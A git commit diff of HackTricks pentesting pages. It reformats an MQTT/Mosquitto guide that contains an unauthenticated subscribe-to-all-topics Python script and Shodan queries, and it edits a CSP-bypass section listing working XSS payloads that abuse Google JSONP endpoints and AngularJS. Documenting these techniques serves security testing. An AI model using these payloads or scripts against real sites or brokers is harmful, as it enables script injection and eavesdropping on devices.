GitBook: [#3360] No subject
This commit is contained in:
parent
a7cb149ce8
commit
ca31549018
|
@ -1,4 +1,4 @@
|
|||
# 1883, 8883 - Pentesting MQTT (Mosquitto)
|
||||
# 1883 - Pentesting MQTT (Mosquitto)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,27 +16,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# Basic Information
|
||||
## Basic Information
|
||||
|
||||
MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.
|
||||
|
||||
**Default port:** 1883 (clear), 8883 (Secure MQTT, MQTT over TLS) [[1][1]]
|
||||
**Default port:** 1883
|
||||
|
||||
```
|
||||
PORT STATE SERVICE REASON
|
||||
1883/tcp open mosquitto version 1.4.8 syn-ack
|
||||
```
|
||||
|
||||
# Inspecting the traffic
|
||||
## Inspecting the traffic
|
||||
|
||||
MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**
|
||||
|
||||
![](<../.gitbook/assets/image (645) (1).png>)
|
||||
|
||||
## [**Brute-Force MQTT**](../brute-force.md#mqtt)
|
||||
### [**Brute-Force MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
|
||||
|
||||
# Pentesting MQTT
|
||||
## Pentesting MQTT
|
||||
|
||||
**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.
|
||||
|
||||
|
@ -60,7 +59,6 @@ mosquitto_sub -t 'test/topic' -v #Subscriribe to 'test/topic'
|
|||
Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**:
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python
|
||||
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
|
||||
import paho.mqtt.client as mqtt
|
||||
import time
|
||||
|
@ -89,11 +87,11 @@ if __name__ == "__main__":
|
|||
main()
|
||||
```
|
||||
|
||||
# More information
|
||||
## More information
|
||||
|
||||
from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
|
||||
|
||||
## The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
|
||||
### The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
|
||||
|
||||
The publish/subscribe model is composed of:
|
||||
|
||||
|
@ -104,7 +102,7 @@ The publish/subscribe model is composed of:
|
|||
|
||||
![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png)
|
||||
|
||||
## Packet Format <a href="#f15a" id="f15a"></a>
|
||||
### Packet Format <a href="#f15a" id="f15a"></a>
|
||||
|
||||
Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
|
||||
|
||||
|
@ -114,13 +112,9 @@ The first field of the fixed header represents the type of the MQTT Packet. All
|
|||
|
||||
![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png)
|
||||
|
||||
# Shodan
|
||||
## Shodan
|
||||
|
||||
* `port:1883 MQTT`
|
||||
* `port:8883 MQTT`
|
||||
|
||||
[1]:http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Network_Connections
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -137,5 +131,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -248,11 +248,14 @@ If the application is using angular JS and scripts are loaded from a whitelisted
|
|||
|
||||
Working payloads:
|
||||
|
||||
```
|
||||
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
|
||||
```html
|
||||
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
|
||||
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
|
||||
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
|
||||
```
|
||||
|
||||
Other JSONP arbitrary execution endpoints can be found in [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) **** (some of them were deleted or fixed)
|
||||
|
||||
### Bypass CSP with dangling markup
|
||||
|
||||
Read [how here](../dangling-markup-html-scriptless-injection.md).
|
||||
|
|
Loading…
Reference in New Issue